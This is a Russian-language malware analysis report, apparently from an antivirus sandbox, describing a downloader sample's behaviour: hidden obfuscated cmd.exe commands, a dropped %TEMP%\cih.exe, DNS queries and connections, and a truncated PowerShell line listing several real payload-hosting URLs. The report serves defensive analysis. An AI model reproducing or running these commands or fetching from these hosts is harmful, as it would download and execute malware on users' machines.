Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c C%TMP:~ -2, -1%d, , /v:^ON ^ ,, , /c" , (sE^t ^ ^w^A^d= EL^ ^zGp k^bx ^W^g^Q^ EbA^ LK4 ^qE^e u0^L 1^H^E^ QC ^ Tj^Z^ R^Qk^ qd^l^ ^eQX n5w Nn2 ^1^xp^ ^q40}ciX^}5cl^{z5^ahZgic^4^Qu^t6R^XapK...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\cih.exe
Сетевая активность
Подключается к
- 'eg####otours.com':80
- 'm3###dutora.com':80
- 'li##ey4.ru':80
UDP
- DNS ASK an##a71.uz
- DNS ASK eg####otours.com
- DNS ASK fr####eliquid.com
- DNS ASK m3###dutora.com
- DNS ASK li##ey4.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c C%TMP:~ -2, -1%d, , /v:^ON ^ ,, , /c" , (sE^t ^ ^w^A^d= EL^ ^zGp k^bx ^W^g^Q^ EbA^ LK4 ^qE^e u0^L 1^H^E^ QC ^ Tj^Z^ R^Qk^ qd^l^ ^eQX n5w Nn2 ^1^xp^ ^q40}ciX^}5cl^{z5^ahZgic^4^Qu^t6R^XapK...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' , , /v:ON ,, , /c" , (sE^t ^ ^w^A^d= EL^ ^zGp k^bx ^W^g^Q^ EbA^ LK4 ^qE^e u0^L 1^H^E^ QC ^ Tj^Z^ R^Qk^ qd^l^ ^eQX n5w Nn2 ^1^xp^ ^q40}ciX^}5cl^{z5^ahZgic^4^Qu^t6R^XapKAcn^m^H}hip^kct^qa^t^...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $rlR='dKp';$GrR='http://an##a71.uz/aH3i9EM@http://egyptmotours.com/EfRRkqPucD@http://friskyeliquid.com/xspcYyA63@http://m3produtora.com/QOlBVnrL40@http://litsey4.ru/V5XLXxDubY'.Split('@');$GSj=...
